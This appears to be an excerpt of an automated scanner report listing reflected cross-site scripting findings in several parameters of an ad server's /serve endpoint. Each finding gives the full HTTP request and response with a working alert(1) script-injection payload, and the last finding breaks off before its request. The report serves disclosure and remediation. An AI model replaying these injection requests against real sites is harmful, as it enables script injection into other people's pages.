GET /serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=601088e68"-alert(1)-"c2ca0ab24f4&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:25 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:25 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=601088e68"-alert(1)-"c2ca0ab24f4&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFP
...[SNIP]...

1.275. http://delivery.steelhousemedia.com/serve [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7e2b"-alert(1)-"29f67fa7dd7 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?cb=766962455d7e2b"-alert(1)-"29f67fa7dd7&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:24 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:24 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=766962455d7e2b"-alert(1)-"29f67fa7dd7&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXL
...[SNIP]...

1.276. http://delivery.steelhousemedia.com/serve [cgid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the cgid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4beb0"-alert(1)-"8d737ba50f4 was submitted in the cgid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=18514beb0"-alert(1)-"8d737ba50f4&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:10 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:10 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=18514beb0"-alert(1)-"8d737ba50f4&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE
...[SNIP]...

1.277. http://delivery.steelhousemedia.com/serve [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc438"-alert(1)-"f9885eb9ab4 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906bc438"-alert(1)-"f9885eb9ab4&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck= HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:10 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:10 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); var originalRequestURL = "delivery.steelhousemedia.com/serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906bc438"-alert(1)-"f9885eb9ab4&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZ
...[SNIP]...

1.278. http://delivery.steelhousemedia.com/serve [ck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the ck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4064b"-alert(1)-"db8871a9ae1 was submitted in the ck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?cb=766962455&sh_rid=adserver006:1924796&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segid=0&eid=29&pp=2.25&tp=766962455&click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck=4064b"-alert(1)-"db8871a9ae1 HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: ccc="OTA2OjM=";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Wed, 27-Jun-2012 01:26:21 GMT;Max-Age=31536000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:26:21 GMT;Max-Age=315360000
Connection: close

<html><head><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head><body><script type='text/javascript'> (function() { if (!used) var used = Array(); v
...[SNIP]...
://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=&ck=4064b"-alert(1)-"db8871a9ae1"; var base_url = "http://rtb.steelhousemedia.com/capsNotify?aid=9297&cid=906&pp=2.25&guid=d09b7564-e06a-439f-88f1-23754bc64beb"; var secure_url = "https://rtb.steelhousemedia.com/capsNotify?aid=9297&c
...[SNIP]...

1.279. http://delivery.steelhousemedia.com/serve [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a278'%3balert(1)//d7cc3815463 was submitted in the click parameter. This input was echoed as 5a278';alert(1)//d7cc3815463 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /serve?ms=1&cb=766962455&eid=29&click=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA%3D%26dst%3D5a278'%3balert(1)//d7cc3815463 HTTP/1.1
Host: delivery.steelhousemedia.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guid=d09b7564-e06a-439f-88f1-23754bc64beb; rt=OTI5NzoxMzA4NzA2MDc5; tts="eyJOUl85Mjk3XzMzOSI6MywiOTI5N180NCI6MTMwODcwNjA3OTcxNywiOTI5N180NiI6MTMwODcwNjA3OTcxNywiOTI5N180OSI6MTMwODcwNjA5NDY5MSwiOTI5N18yNzAiOjEzMDg3MDYwOTQ2OTEsIjkyOTdfNDgiOjEzMDg3MDYwNzk3MTcsIk5SXzkyOTdfMTM5IjozLCI5Mjk3XzM5NSI6MTMwODcwNjA5NDY5MSwiTlJfOTI5N18yNzYiOjUsIk5SXzkyOTdfMTczIjozLCI5Mjk3XzI3NiI6MTMwODcwNjA5NTM0NywiOTI5N183NSI6MTMwODcwNjA3OTcxNywiOTI5N180MiI6MTMwODcwNjA3OTcxNywiOTI5N18xMjYiOjEzMDg3MDYwNzk3MTcsIjkyOTdfMTcwIjoxMzA4NzA2MDc5NzE3LCI5Mjk3XzEzOSI6MTMwODcwNjA3OTcxNywiOTI5N18xNzMiOjEzMDg2Nzk1MjQ3MzAsIk5SXzkyOTdfNzUiOjMsIjkyOTdfMzM5IjoxMzA4NzA2MDk0NjkxLCJOUl85Mjk3XzI2OSI6MywiTlJfOTI5N18xMjYiOjMsIk5SXzkyOTdfNDkiOjMsIk5SXzkyOTdfNDgiOjMsIjkyOTdfMjY5IjoxMzA4NzA2MDk0NjkxLCI5Mjk3XzIxNyI6MTMwODcwNjA3OTcxNywiTlJfOTI5N180MiI6MywiTlJfOTI5N18yNzAiOjMsIk5SXzkyOTdfNDYiOjMsIk5SXzkyOTdfMTcwIjozLCJOUl85Mjk3XzM5NSI6MywiTlJfOTI5N180NCI6Mywic3RpY2t5SWRfMjkiOm51bGwsIk5SXzkyOTdfMjE3IjozfQ=="; ccc="OTA2OjE="; view="OTI5NzphaWQ9NjAwNyZjZ2lkPTE4NTAmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9NjImdnQ9MQ=="

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
P3P: CP="IDC DSP COR"
Set-Cookie: view="OTI5NzphaWQ9NjAxMCZjZ2lkPTE4NTEmY2lkPTkwNiZhZHZfaWQ9OTI5NyZlaWQ9MjkmdnQ9MQ==";Version=1;Path=/;Domain=.steelhousemedia.com;Expires=Fri, 25-Jun-2021 01:25:49 GMT;Max-Age=315360000
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

document.write('<iframe src="http://delivery.steelhousemedia.com/serve?cb=766962455&sh_rid=adserver007:1924302&ms=1&aid=6010&cgid=1851&cid=906&guid=d09b7564-e06a-439f-88f1-23754bc64beb&advid=9297&segi
...[SNIP]...
http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLwQ0CMQwEwIUDlNO1wddSgmMnbgKJEhJsiqERauBFPXSBmP9s2AE4NzfJNSZJLkr1MZys6yBuzkPYlO-WsL-u9Nyw_MesY85QJo7eqLkYedGgXtnLRYxzj4QDYLeEI_B9J5yAzws_ialUonMAAAA=%26dst=5a278';alert(1)//d7cc3815463&ck=" frameborder="0" scrolling="no" marginwidth="0" marginheight="0" width="300" height="250" id="766962455">
...[SNIP]...

1.280. http://delivery.steelhousemedia.com/serve [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://delivery.steelhousemedia.com
Path:   /serve

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3faa3"><script>alert(1)</script>fde6f550ff2 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

